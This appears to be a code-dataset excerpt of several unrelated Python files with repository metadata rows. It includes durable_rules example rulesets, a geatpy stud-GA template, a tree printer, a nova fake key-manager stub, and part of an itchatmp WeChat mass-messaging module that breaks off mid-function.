print('Hello {0}'.format(c.m.subject))
# on ruleset start
@when_start
def start(host):
host.post('test', { 'subject': 'World' })
with ruleset('animal0'):
# will be triggered by 'Kermit eats flies'
@when_all((m.predicate == 'eats') & (m.object == 'flies'))
def frog(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'frog' })
@when_all((m.predicate == 'eats') & (m.object == 'worms'))
def bird(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'bird' })
# will be chained after asserting 'Kermit is frog'
@when_all((m.predicate == 'is') & (m.object == 'frog'))
def green(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'green' })
@when_all((m.predicate == 'is') & (m.object == 'bird'))
def black(c):
c.assert_fact({ 'subject': c.m.subject, 'predicate': 'is', 'object': 'black' })
@when_all(+m.subject)
def output(c):
print('Fact: {0} {1} {2}'.format(c.m.subject, c.m.predicate, c.m.object))
@when_start
def start(host):
host.assert_fact('animal0', { 'subject': 'Kermit', 'predicate': 'eats', 'object': 'flies' })
with ruleset('risk'):
@when_all(c.first << m.t == 'purchase',
c.second << m.location != c.first.location)
# the event pair will only be observed once
def fraud(c):
print('Fraud detected -> {0}, {1}'.format(c.first.location, c.second.location))
@when_start
def start(host):
# 'post' submits events, try 'assert' instead and to see differt behavior
host.post('risk', {'t': 'purchase', 'location': 'US'});
host.post('risk', {'t': 'purchase', 'location': 'CA'});
with ruleset('flow'):
# state condition uses 's'
@when_all(s.status == 'start')
def start(c):
# state update on 's'
c.s.status = 'next'
print('start')
@when_all(s.status == 'next')
def next(c):
c.s.status = 'last'
print('next')
@when_all(s.status == 'last')
def last(c):
c.s.status = 'end'
print('last')
# deletes state at the end
c.delete_state()
@when_start
def on_start(host):
# modifies default context state
host.patch_state('flow', { 'status': 'start' })
with ruleset('expense0'):
@when_all((m.subject == 'approve') | (m.subject == 'ok'))
def approved(c):
print ('Approved subject: {0}'.format(c.m.subject))
@when_start
def start(host):
host.post('expense0', { 'subject': 'approve'})
with ruleset('match'):
@when_all(m.url.matches('(https?://)?([0-9a-z.-]+)%.[a-z]{2,6}(/[A-z0-9_.-]+/?)*'))
def approved(c):
print ('match url ->{0}'.format(c.m.url))
@when_start
def start(host):
host.post('match', { 'url': 'https://github.com' })
host.post('match', { 'url': 'http://github.com/jruizgit/rul!es' })
host.post('match', { 'url': 'https://github.com/jruizgit/rules/reference.md' })
host.post('match', { 'url': '//rules'})
host.post('match', { 'url': 'https://github.c/jruizgit/rules' })
with ruleset('strings'):
@when_all(m.subject.matches('hello.*'))
def starts_with(c):
print ('string starts with hello -> {0}'.format(c.m.subject))
@when_all(m.subject.matches('.*hello'))
def ends_with(c):
print ('string ends with hello -> {0}'.format(c.m.subject))
@when_all(m.subject.imatches('.*hello.*'))
def contains(c):
print ('string contains hello (case insensitive) -> {0}'.format(c.m.subject))
@when_start
def start(host):
host.assert_fact('strings', { 'subject': 'HELLO world' })
host.assert_fact('strings', { 'subject': 'world hello' })
host.assert_fact('strings', { 'subject': 'hello hi' })
host.assert_fact('strings', { 'subject': 'has Hello string' })
host.assert_fact('strings', { 'subject': 'does not match' })
with ruleset('risk0'):
@when_all(c.first << m.amount > 10,
c.second << m.amount > c.first.amount * 2,
c.third << m.amount > c.first.amount + c.second.amount)
def detected(c):
print('fraud detected -> {0}'.format(c.first.amount))
print(' -> {0}'.format(c.second.amount))
print(' -> {0}'.format(c.third.amount))
@when_start
def start(host):
host.post('risk0', { 'amount': 50 })
host.post('risk0', { 'amount': 200 })
host.post('risk0', { 'amount': 300 })
with ruleset('expense1'):
@when_any(all(c.first << m.subject == 'approve',
c.second << m.amount == 1000),
all(c.third << m.subject == 'jumbo',
c.fourth << m.amount == 10000))
def action(c):
if c.first:
print ('Approved {0} {1}'.format(c.first.subject, c.second.amount))
else:
print ('Approved {0} {1}'.format(c.third.subject, c.fourth.amount))
@when_start
def start(host):
host.post('expense1', { 'subject': 'approve' })
host.post('expense1', { 'amount': 1000 })
host.post('expense1', { 'subject': 'jumbo' })
host.post('expense1', { 'amount': 10000 })
with ruleset('risk1'):
@when_all(c.first << m.t == 'deposit',
none(m.t == 'balance'),
c.third << m.t == 'withrawal',
c.fourth << m.t == 'chargeback')
def detected(c):
print('fraud detected {0} {1} {2}'.format(c.first.t, c.third.t, c.fourth.t))
@when_start
def start(host):
host.post('risk1', { 't': 'deposit' })
host.post('risk1', { 't': 'withrawal' })
host.post('risk1', { 't': 'chargeback' })
with ruleset('attributes'):
@when_all(pri(3), m.amount < 300)
def first_detect(c):
print('attributes P3 ->{0}'.format(c.m.amount))
@when_all(pri(2), m.amount < 200)
def second_detect(c):
print('attributes P2 ->{0}'.format(c.m.amount))
@when_all(pri(1), m.amount < 100)
def third_detect(c):
print('attributes P1 ->{0}'.format(c.m.amount))
@when_start
def start(host):
host.assert_fact('attributes', { 'amount': 50 })
host.assert_fact('attributes', { 'amount': 150 })
host.assert_fact('attributes', { 'amount': 250 })
with ruleset('expense2'):
# this rule will trigger as soon as three events match the condition
@when_all(count(3), m.amount < 100)
def approve(c):
print('approved {0}'.format(c.m))
# this rule will be triggered when 'expense' is asserted batching at most two results
@when_all(cap(2),
c.expense << m.amount >= 100,
c.approval << m.review == True)
def reject(c):
print('rejected {0}'.format(c.m))
@when_start
def start(host):
host.post_batch('expense2', [{ 'amount': 10 },
{ 'amount': 20 },
{ 'amount': 100 },
{ 'amount': 30 },
{ 'amount': 200 },
{ 'amount': 400 }])
host.assert_fact('expense2', { 'review': True })
with ruleset('flow0'):
timer = None
def start_timer(time, callback):
timer = threading.Timer(time, callback)
timer.daemon = True
timer.start()
@when_all(s.state == 'first')
# async actions take a callback argument to signal completion
def first(c, complete):
def end_first():
c.s.state = 'second'
print('first completed')
# completes the action after 3 seconds
complete(None)
start_timer(3, end_first)
@when_all(s.state == 'second')
def second(c, complete):
def end_second():
c.s.state = 'third'
print('second completed')
# completes the action after 6 seconds
# use the first argument to signal an error
complete(Exception('error detected'))
start_timer(6, end_second)
# overrides the 5 second default abandon timeout
return 10
@when_start
def on_start(host):
host.patch_state('flow0', { 'state': 'first' })
with ruleset('flow1'):
@when_all(m.action == 'start')
def first(c):
raise Exception('Unhandled Exception!')
# when the exception property exists
@when_all(+s.exception)
def second(c):
print(c.s.exception)
c.s.exception = None
@when_start
def on_start(host):
host.post('flow1', { 'action': 'start' })
with ruleset('timer'):
# will trigger when MyTimer expires
@when_any(all(s.count == 0),
all(s.count < 5,
timeout('MyTimer')))
def pulse(c):
c.s.count += 1
# MyTimer will expire in 5 seconds
c.start_timer('MyTimer', 5)
print('pulse ->{0}'.format(datetime.datetime.now().strftime('%I:%M:%S%p')))
@when_all(m.cancel == True)
def cancel(c):
c.cancel_timer('MyTimer')
print('canceled timer')
@when_start
def on_start(host):
host.patch_state('timer', { 'count': 0 })
# curl -H "content-type: application/json" -X POST -d '{"cancel": true}' http://localhost:5000/timer/events
with statechart('risk3'):
with state('start'):
@to('meter')
def start(c):
c.start_timer('RiskTimer', 5)
with state('meter'):
@to('fraud')
@when_all(count(3), c.message << m.amount > 100)
def fraud(c):
for e in c.m:
print(e.message)
@to('exit')
@when_all(timeout('RiskTimer'))
def exit(c):
print('exit')
state('fraud')
state('exit')
@when_start
def on_start(host):
# three events in a row will trigger the fraud rule
host.post('risk3', { 'amount': 200 })
host.post('risk3', { 'amount': 300 })
host.post('risk3', { 'amount': 400 })
# two events will exit after 5 seconds
host.post('risk3', { 'sid': 1, 'amount': 500 })
host.post('risk3', { 'sid': 1, 'amount': 600 })
with statechart('risk4'):
with state('start'):
@to('meter')
def start(c):
c.start_timer('VelocityTimer', 5, True)
with state('meter'):
@to('meter')
@when_all(cap(5),
m.amount > 100,
timeout('VelocityTimer'))
def some_events(c):
print('velocity: {0} in 5 seconds'.format(len(c.m)))
# resets and restarts the manual reset timer
c.reset_timer('VelocityTimer')
c.start_timer('VelocityTimer', 5, True)
@to('meter')
@when_all(pri(1), timeout('VelocityTimer'))
def no_events(c):
print('velocity: no events in 5 seconds')
c.reset_timer('VelocityTimer')
c.start_timer('VelocityTimer', 5, True)
@when_start
def on_start(host):
# the velocity will be 4 events in 5 seconds
host.post('risk4', { 'amount': 200 })
host.post('risk4', { 'amount': 300 })
host.post('risk4', { 'amount': 50 })
host.post('risk4', { 'amount': 500 })
host.post('risk4', { 'amount': 600 })
# curl -H "content-type: application/json" -X POST -d '{"amount": 200}' http://localhost:5000/risk4/events
with statechart('expense3'):
# initial state 'input' with two triggers
with state('input'):
# trigger to move to 'denied' given a condition
@to('denied')
@when_all((m.subject == 'approve') & (m.amount > 1000))
# action executed before state change
def denied(c):
print ('denied amount {0}'.format(c.m.amount))
@to('pending')
@when_all((m.subject == 'approve') & (m.amount <= 1000))
def request(c):
print ('requesting approve amount {0}'.format(c.m.amount))
# intermediate state 'pending' with two triggers
with state('pending'):
@to('approved')
@when_all(m.subject == 'approved')
def approved(c):
print ('expense approved')
@to('denied')
@when_all(m.subject == 'denied')
def denied(c):
print ('expense denied')
# 'denied' and 'approved' are final states
state('denied')
state('approved')
@when_start
def on_start(host):
# events directed to default statechart instance
host.post('expense3', { 'subject': 'approve', 'amount': 100 });
host.post('expense3', { 'subject': 'approved' });
# events directed to statechart instance with id '1'
host.post('expense3', { 'sid': 1, 'subject': 'approve', 'amount': 100 });
host.post('expense3', { 'sid': 1, 'subject': 'denied' });
# events directed to statechart instance with id '2'
host.post('expense3', { 'sid': 2, 'subject': 'approve', 'amount': 10000 });
with flowchart('expense4'):
# initial stage 'input' has two conditions
with stage('input'):
to('request').when_all((m.subject == 'approve') & (m.amount <= 1000))
to('deny').when_all((m.subject == 'approve') & (m.amount > 1000))
# intermediate stage 'request' has an action and three conditions
with stage('request'):
@run
def request(c):
print('requesting approve')
to('approve').when_all(m.subject == 'approved')
to('deny').when_all(m.subject == 'denied')
# reflexive condition: if met, returns to the same stage
to('request').when_all(m.subject == 'retry')
with stage('approve'):
@run
def approved(c):
print('expense approved')
with stage('deny'):
@run
def denied(c):
print('expense denied')
@when_start
def start(host):
# events for the default flowchart instance, approved after retry
host.post('expense4', { 'subject': 'approve', 'amount': 100 })
host.post('expense4', { 'subject': 'retry' })
host.post('expense4', { 'subject': 'approved' })
# events for the flowchart instance '1', denied after first try
host.post('expense4', { 'sid': 1, 'subject': 'approve', 'amount': 100})
host.post('expense4', { 'sid': 1, 'subject': 'denied'})
# event for the flowchart instance '2' immediately denied
host.post('expense4', { 'sid': 2, 'subject': 'approve', 'amount': 10000})
with statechart('worker'):
# super-state 'work' has two states and one trigger
with state('work'):
# sub-sate 'enter' has only one trigger
with state('enter'):
@to('process')
@when_all(m.subject == 'enter')
def continue_process(c):
print('start process')
with state('process'):
@to('process')
@when_all(m.subject == 'continue')
def continue_process(c):
print('continue processing')
# the super-state trigger will be evaluated for all sub-state triggers
@to('canceled')
@when_all(m.subject == 'cancel')
def cancel(c):
print('cancel process')
state('canceled')
@when_start
def start(host):
# will move the statechart to the 'work.process' sub-state
host.post('worker', { 'subject': 'enter' })
# will keep the statechart to the 'work.process' sub-state
host.post('worker', { 'subject': 'continue' })
host.post('worker', { 'subject': 'continue' })
# will move the statechart out of the work state
host.post('worker', { 'subject': 'cancel' })
with ruleset('expense5'):
@when_all(c.bill << (m.t == 'bill') & (m.invoice.amount > 50),
c.account << (m.t == 'account') & (m.payment.invoice.amount == c.bill.invoice.amount))
def approved(c):
print ('bill amount ->{0}'.format(c.bill.invoice.amount))
print ('account payment amount ->{0}'.format(c.account.payment.invoice.amount))
@when_start
def start(host):
host.post('expense5', {'t': 'bill', 'invoice': {'amount': 100}})
host.post('expense5', {'t': 'account', 'payment': {'invoice': {'amount': 100}}})
with ruleset('bookstore'):
# this rule will trigger for events with status
@when_all(+m.status)
def event(c):
print('Reference {0} status {1}'.format(c.m.reference, c.m.status))
@when_all(+m.name)
def fact(c):
print('Added {0}'.format(c.m.name))
c.retract_fact({
'name': 'The new book',
'reference': '75323',
'price': 500,
'seller': 'bookstore'
})
# this rule will be triggered when the fact is retracted
@when_all(none(+m.name))
def empty(c):
print('No books')
@when_start
def start(host):
# will return 0 because the fact assert was successful
print(host.assert_fact('bookstore', {
'name': 'The new book',
'seller': 'bookstore',
'reference': '75323',
'price': 500
}))
# will return 212 because the fact has already been asserted
print(host.assert_fact('bookstore', {
'reference': '75323',
'name': 'The new book',
'price': 500,
'seller': 'bookstore'
}))
# will return 0 because a new event is being posted
print(host.post('bookstore', {
'reference': '75323',
'status': 'Active'
}))
# will return 0 because a new event is being posted
print(host.post('bookstore', {
'reference': '75323',
'status': 'Active'
}))
with ruleset('risk5'):
# compares properties in the same event, this expression is evaluated in the client
@when_all(m.debit > m.credit * 2)
def fraud_1(c):
print('debit {0} more than twice the credit {1}'.format(c.m.debit, c.m.credit))
# compares two correlated events, this expression is evaluated in the backend
@when_all(c.first << m.amount > 100,
c.second << m.amount > c.first.amount + m.amount / 2)
def fraud_2(c):
print('fraud detected ->{0}'.format(c.first.amount))
print('fraud detected ->{0}'.format(c.second.amount))
@when_start
def start(host):
host.post('risk5', { 'debit': 220, 'credit': 100 })
host.post('risk5', { 'debit': 150, 'credit': 100 })
host.post('risk5', { 'amount': 200 })
host.post('risk5', { 'amount': 500 })
with ruleset('risk6'):
# matching primitive array
@when_all(m.payments.allItems((item > 100) & (item < 400)))
def rule1(c):
print('should not match {0}'.format(c.m.payments))
# matching primitive array
@when_all(m.payments.allItems((item > 100) & (item < 500)))
def rule1(c):
print('fraud 1 detected {0}'.format(c.m.payments))
# matching object array
@when_all(m.payments.allItems((item.amount < 250) | (item.amount >= 300)))
def rule2(c):
print('fraud 2 detected {0}'.format(c.m.payments))
# pattern matching string array
@when_all(m.cards.anyItem(item.matches('three.*')))
def rule3(c):
print('fraud 3 detected {0}'.format(c.m.cards))
# matching nested arrays
@when_all(m.payments.anyItem(item.allItems(item < 100)))
def rule4(c):
print('fraud 4 detected {0}'.format(c.m.payments))
@when_start
def start(host):
host.post('risk6', {'payments': [ 150, 300, 450 ]})
host.post('risk6', {'payments': [ { 'amount' : 200 }, { 'amount' : 300 }, { 'amount' : 450 } ]})
host.post('risk6', {'cards': [ 'one card', 'two cards', 'three cards' ]})
host.post('risk6', {'payments': [ [ 10, 20, 30 ], [ 30, 40, 50 ], [ 10, 20 ] ]})
# with ruleset('flow'):
# @when_all(m.status == 'start')
# def start(c):
# c.post({ 'status': 'next' })
# print('start')
# # the process will always exit here every time the action is run
# # when restarting the process this action will be retried after a few seconds
# @when_all(m.status == 'next')
# def next(c):
# c.post({ 'status': 'last' })
# print('next')
# os._exit(1)
# @when_all(m.status == 'last')
# def last(c):
# print('last')
# @when_start
# def on_start(host):
# host.post('flow', { 'status': 'start' })
run_all()
| [
"jr3791@live.com"
] | jr3791@live.com |
2ba794c5fbdf6b165029c3b20b7d4ae08486b115 | 4fd77ce692e10e962483c7e3e6e76c44887e9f52 | /geatpy/templates/soeas/GA/studGA/soea_psy_studGA_templet.py | 7cb191a9338b905bc256f6ecb2c43a2de4b72a72 | [
"MIT"
] | permissive | Passion-long/geatpy | d1aaf1622058473649840a9e2e26f9d0b0844bce | 8e2ab8730babaae640272bd4c77106519bdd120c | refs/heads/master | 2020-07-09T13:40:36.217907 | 2019-08-23T03:36:12 | 2019-08-23T03:36:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,750 | py | # -*- coding: utf-8 -*-
import numpy as np
import geatpy as ea # 导入geatpy库
from sys import path as paths
from os import path
paths.append(path.split(path.split(path.realpath(__file__))[0])[0])
class soea_psy_studGA_templet(ea.SoeaAlgorithm):
"""
soea_psy_studGA_templet.py - Polysomy Stud GA templet(多染色体种马遗传算法模板)
模板说明:
该模板是内置算法模板soea_studGA_templet的多染色体版本,
因此里面的种群对象为支持混合编码的多染色体种群类PsyPopulation类的对象。
算法描述:
本模板实现的是种马遗传算法。算法流程详见参考文献[1]。
模板使用注意:
本模板调用的目标函数形如:aimFunc(pop),
其中pop为种群类的对象,代表一个种群,
pop对象的Phen属性(即种群染色体的表现型)等价于种群所有个体的决策变量组成的矩阵,
该函数根据该Phen计算得到种群所有个体的目标函数值组成的矩阵,并将其赋值给pop对象的ObjV属性。
若有约束条件,则在计算违反约束程度矩阵CV后赋值给pop对象的CV属性(详见Geatpy数据结构)。
该函数不返回任何的返回值,求得的目标函数值保存在种群对象的ObjV属性中,
违反约束程度矩阵保存在种群对象的CV属性中。
例如:population为一个种群对象,则调用aimFunc(population)即可完成目标函数值的计算,
此时可通过population.ObjV得到求得的目标函数值,population.CV得到违反约束程度矩阵。
若不符合上述规范,则请修改算法模板或自定义新算法模板。
参考文献:
[1] Khatib W , Fleming P J . The stud GA: A mini revolution?[C]// International
Conference on Parallel Problem Solving from Nature. Springer, Berlin, Heidelberg, 1998.
"""
def __init__(self, problem, population):
ea.SoeaAlgorithm.__init__(self, problem, population) # 先调用父类构造方法
if str(type(population)) != "<class 'PsyPopulation.PsyPopulation'>":
raise RuntimeError('传入的种群对象必须为PsyPopulation类型')
self.name = 'psy-studGA'
self.problem = problem
self.population = population
self.selFunc = 'tour' # 锦标赛选择算子
# 由于有多个染色体,因此需要用多个重组和变异算子,于是对应有多个重组和变异概率
self.recFuncs = []
self.mutFuncs = []
self.pcs = []
self.pms = []
for i in range(population.ChromNum):
if population.Encodings[i] == 'P':
self.recFuncs.append('xovpmx') # 部分匹配交叉
self.mutFuncs.append('mutinv') # 染色体片段逆转变异
else:
self.recFuncs.append('xovdp') # 两点交叉
if population.Encodings[i] == 'BG':
self.mutFuncs.append('mutbin') # 二进制变异
elif population.Encodings[i] == 'RI':
self.mutFuncs.append('mutbga') # breeder GA中的变异算子
else:
raise RuntimeError('编码方式必须为''BG''、''RI''或''P''.')
self.pcs.append(1) # 重组概率
self.pms.append(1) # 整条染色体的变异概率
def run(self):
#==========================初始化配置===========================
population = self.population
NIND = population.sizes
self.initialization() # 初始化算法模板的一些动态参数
#===========================准备进化============================
population.initChrom(NIND) # 初始化种群染色体矩阵(内含染色体解码,详见PsyPopulation类的源码)
self.problem.aimFunc(population) # 计算种群的目标函数值
population.FitnV = ea.scaling(self.problem.maxormins * population.ObjV, population.CV) # 计算适应度
self.evalsNum = population.sizes # 记录评价次数
#===========================开始进化============================
while self.terminated(population) == False:
bestIdx = np.argmax(population.FitnV, axis = 0) # 得到当代的最优个体的索引, 设置axis=0可使得返回一个向量
studPop = population[np.tile(bestIdx, (NIND//2))] # 复制最优个体NIND//2份,组成一个“种马种群”
restPop = population[np.where(np.array(range(NIND)) != bestIdx)[0]] # 得到除去精英个体外其它个体组成的种群
# 选择个体,以便后面与种马种群进行交配
tempPop = restPop[ea.selecting(self.selFunc, restPop.FitnV, (NIND - studPop.sizes))]
# 将种马种群与选择出来的个体进行合并
population = studPop + tempPop
# 进行进化操作,分别对各种编码的染色体进行重组和变异
for i in range(population.ChromNum):
population.Chroms[i] = ea.recombin(self.recFuncs[i], population.Chroms[i], self.pcs[i]) # 重组
population.Chroms[i] = ea.mutate(self.mutFuncs[i], population.Encodings[i], population.Chroms[i], population.Fields[i], self.pms[i]) # 变异
# 求进化后个体的目标函数值
population.Phen = population.decoding() # 染色体解码
self.problem.aimFunc(population)
self.evalsNum += population.sizes # 更新评价次数
population.FitnV = ea.scaling(self.problem.maxormins * population.ObjV, population.CV) # 计算适应度
return self.finishing(population) # 调用finishing完成后续工作并返回结果
| [
"jazzbin@geatpy.com"
] | jazzbin@geatpy.com |
07e725cccf87298783a7e6d7e42e718a7298fd4a | 65ed194a0b1f7eed060a669fe58cd216ac0eb2f1 | /q2.py | 56bac1056893723ac54742e54a570196be02c753 | [] | no_license | julia-zhao/for-synqrinus | b501e84d4a8102df185fa2b7b6b128fd04491a58 | fd278391c2b8d69302b2514821d5229f45ba8375 | refs/heads/master | 2021-01-01T07:22:39.749516 | 2020-02-17T15:56:33 | 2020-02-17T15:56:33 | 239,168,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,871 | py | class Node:
def __init__ (self, data):
self.data = data
self.children = [] #dict of Nodes
def insert(self, parent, data):
if (self.data == parent):
self.children.append(Node(data))
else:
#insert a child node into the last child
self.children[-1].insert(parent, data)
def level(self, data, level):
if (self.data == data):
return level
#find the two children nodes that data falls between
i = 0
for node in self.children:
#operating under the assumption that the inputs are in order (not random)
if (node.data > data):
i-=1
break
elif (node.data == data): #found the data within the children of current node
return level + 1
else:
i+=1
next_level = self.children[i].level(data, level+1)
return next_level
def print_out(self, level, num_chars, root):
print(self.data)
level = self.level(self.data,level+1)
while self.children: #children is not empty
if (level > 1):
s = root.make_string("",self.data)
print (s, end = '')
if (level > 0):
print (u'\u2514', end = '') #check for └ (U+2514)
self.children[0].print_out(level, num_chars + 1, root)
self.children.pop(0) #remove this child once you have traversed through it
def right_check(self, data): #Check that all levels only have one children left
if (len(self.children) > 1):
return False
elif (self.children):
self.children[0].right_check(data)
else:
return True
def make_string(self, s, data):
if (len(self.children) > 1):
s += u'\u2502'
else:
s += ' '
#Check if data is found in one of the children nodes
for node in self.children:
if (node.data==data):
return s
if (self.data == data):
return s
#find the two children nodes that data falls between
i = 0
if (len(self.children) > 1):
for node in self.children:
#operating under the assumption that the inputs are in order (not random)
if (node.data > data):
i-=1
break
else:
i+=1
s = self.children[i].make_string(s, data)
return s
#end of class
def main():
root = 0
#loop until end of file
with open('test.txt') as test_file:
for line in test_file:
data = line.strip('][ \n') #get only the data
data = tuple([i for i in data.replace("\"", "").split(" ")])
if (data[1] == 'nil'):
root = Node(data[0])
else:
root.insert(data[1], data[0])
root.print_out(0, 0, root)
if __name__== "__main__":
main()
#Case 1
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('C', 'D')
#Case 2
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('B', 'D')
# root.insert('A', 'E')
#Case 3
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('B', 'D')
# root.insert('D', 'E')
# root.insert('B', 'F')
# root.insert('A', 'G')
# root.insert('G', 'H')
#Case 4
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('C', 'D')
# root.insert('D', 'E')
# root.insert('E', 'F')
# root.insert('C', 'G')
# root.insert('A', 'H')
# root.insert('H', 'I')
# root.insert('I', 'J')
# root.insert('H', 'K')
# root.insert('K', 'L')
# level = root.level('E', 0)
# print ("level is: " + str(level))
#root.print_out(0, 0, root) | [
"zhj.julia@gmail.com"
] | zhj.julia@gmail.com |
545aac01abbebdbef94ce6fc238f142f7cc74f19 | c27c51f5c33e0431dbe7db6e18c21b249d476cfa | /OpenSource_Python_Code/nova-2013.2/nova/tests/keymgr/fake.py | 85e62e3dcf9076b4adb4dd85da8723f0fe4f1411 | [
"Apache-2.0"
] | permissive | bopopescu/Python_Stuff | 9bef74e0db17bb5e3ba2d908ced01ee744820d80 | 9aa94a0fa5e4e802090c7b29ec88b840e304d9e5 | refs/heads/master | 2022-11-20T06:54:36.581623 | 2017-12-04T18:56:02 | 2017-12-04T18:56:02 | 282,171,169 | 0 | 0 | null | 2020-07-24T08:54:37 | 2020-07-24T08:54:36 | null | UTF-8 | Python | false | false | 854 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Justin Santa Barbara
# Copyright 2012 OpenStack LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of a fake key manager."""
from nova.keymgr import mock_key_mgr
def fake_api():
return mock_key_mgr.MockKeyManager()
| [
"thelma1944@gmail.com"
] | thelma1944@gmail.com |
84c1b24826b45edc4f25012eca81cc7fc385ed02 | 36fce47d77e6a66ec68b1c93451ff25f46b6b356 | /luogu/SequentialStructure/P5709.py | 869d51d850389b5e776ab9db1e7422b747afe6cd | [] | no_license | Brvc3/algorithms | b474962f44d8bf4b3b1281247c2ffc81b91cdbe7 | 554acfb512f1fe7c9aae27e9b044786ea69e861c | refs/heads/main | 2023-07-20T20:42:04.500192 | 2021-09-01T08:32:54 | 2021-09-01T08:32:54 | 401,984,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | m,t,s = list(map(float,input().rstrip().split()))
if t==0:
print(0)
exit(0)
left = int(m - s/t)
print(max(0,left)) | [
"brvc3@jnsec.org"
] | brvc3@jnsec.org |
670bf7861c66ba3262b153253670f01ea97f1060 | c50e267978e01b54afdba75f6a98ad114aaa1c80 | /reedima/articles/migrations/0003_auto_20191226_1203.py | 90bdabe9ecb48629c53afde6f4da3ce1d6da2c48 | [] | no_license | Dilshan1997/reedima-1 | f89309d384419b64249e7b0bb6b314eb7e09f695 | 02fd67a07427693ca0f8770c0bbc18b997810adc | refs/heads/master | 2022-06-20T00:18:06.954607 | 2020-05-11T14:58:19 | 2020-05-11T14:58:19 | 263,064,023 | 1 | 0 | null | 2020-05-11T14:20:03 | 2020-05-11T14:20:02 | null | UTF-8 | Python | false | false | 439 | py | # Generated by Django 3.0.1 on 2019-12-26 06:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0002_auto_20191226_1138'),
]
operations = [
migrations.AlterField(
model_name='post',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| [
"shane.thiwanka@gmail.com"
] | shane.thiwanka@gmail.com |
9c1df693b065f41ae2067d039224caed2c72d384 | cd26498ce1a963fc12607e3c2e5f26d738a6d52c | /queryTaolun/urls.py | e261a7e4b3ff349d53f68eaece80d5c6a49541f6 | [] | no_license | DaneWang9513/Wx_miniprogram_server | de2bea44d94e35065102be736b59e654484ba4a4 | e15747ea567cdd7cc11b2777672fd388237ab2f7 | refs/heads/master | 2021-02-27T10:13:07.640295 | 2020-03-07T09:49:58 | 2020-03-07T09:49:58 | 245,598,532 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | from django.conf.urls import url,include
from . import views
urlpatterns = [
url(r'getTaolun',views.getTaolun),
url(r'Taolun_detail',views.Taolun_detail)
] | [
"danewang9513@gmail.com"
] | danewang9513@gmail.com |
848356b8842293f30d58db6ccfc7eb592c6638f8 | 7ba131dadd14574d0dc463eac483b48e505d9a67 | /itchatmp/controllers/mpapi/mp/messages.py | 23161a6eb430de2c24c5073f8d647048adbe49da | [
"MIT"
] | permissive | sysuzyq/itchatmp | a40e615016c43c12c989a0a0257069ead042464c | be235d023b6a55123706d56cd0d149e4271b2c0c | refs/heads/master | 2021-01-19T23:59:34.792413 | 2017-03-15T06:54:52 | 2017-03-15T06:54:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,458 | py | ''' This package is for mass texting in wechat mp
1. What can we send?
- IMAGE, VOICE, VIDEO, TEXT, NEWS, CARD
2. How to send them?
- we use send_some / send_all method
`send_some(targetIdList, msgType, mediaId, additionalDict)`
- for msg like text and card, just pass content as msgId
- for files like image, voice, video, we need to upload them first
`upload(fileType, openedFile, additionalDict, permanent)`
- for news, you need to form them first and upload to get msgId
`create_news(newsDict, permanent)`
for images used in news, you need to turn them into url first
`get_image_url(openedFile)`
- SPECIAL WARNING: video is a little bit **STRANGE**
when uploading or sending, you need to pass additionalDict to method
`{"title" :VIDEO_TITLE, "introduction" :INTRODUCTION}`
3. I alse listed API list for you:
- SENDING
send_some
send_all
preview
- MSG MANAGING
delete
get
- TEMP MATERIAL MANAGING
upload
download
- PERMENENT MATERIAL MANAGING
get_material
delete_material
get_materialcount
batchget_material
- FORM NEWS
create_news
update_news
get_image_url
'''
import logging, json, os, mimetypes, io, re
from ..requests import requests
from .common import access_token
from itchatmp.utils import retry, encode_send_dict
from itchatmp.config import SERVER_URL
from itchatmp.content import (
IMAGE, VOICE, VIDEO, THUMB, TEXT, NEWS, CARD)
from itchatmp.returnvalues import ReturnValue
logger = logging.getLogger('itchatmp')
@access_token
def send_some(msgType, mediaId, additionalDict={},
targetIdList=[], partyIdList=[], tagIdList=[],
agentId=None, accessToken=None):
msgDict = __form_send_dict(msgType, mediaId, additionalDict)
if not msgDict: return msgDict
if not isinstance(targetIdList, list) or len(targetIdList) < 2:
return ReturnValue({'errcode': 40130})
msgDict['touser'] = targetIdList
r = requests.post('%s/cgi-bin/message/mass/send?access_token=%s' %
(SERVER_URL, accessToken), data=encode_send_dict(msgDict))
def _wrap_result(result):
return ReturnValue(result.json())
r._wrap_result = _wrap_result
return r
@access_token
def send_all(msgType, mediaId, additionalDict={},
tagId=None, agentId=None, accessToken=None):
msgDict = __form_send_dict(msgType, mediaId, additionalDict)
if not msgDict: return msgDict
if tagId is None:
msgDict['filter'] = {'is_to_all': True, 'tag_id': 0}
else:
msgDict['filter'] = {'is_to_all': False, 'tag_id': tagId}
r = requests.post('%s/cgi-bin/message/mass/sendall?access_token=%s' %
(SERVER_URL, accessToken), data=encode_send_dict(msgDict))
def _wrap_result(result):
result = ReturnValue(result.json())
if 'media_id' in result: result['errcode'] = 0
return result
r._wrap_result = _wrap_result
return r
@access_token
def preview(msgType, mediaId, additionalDict={},
toUserId=None, toWxAccount=None, accessToken=None):
msgDict = __form_send_dict(msgType, mediaId, additionalDict)
if not msgDict: return msgDict
if (toUserId or toWxAccount) is None:
return ReturnValue({'errcode': -10003})
else:
if toUserId is not None: msgDict['touser'] = toUserId
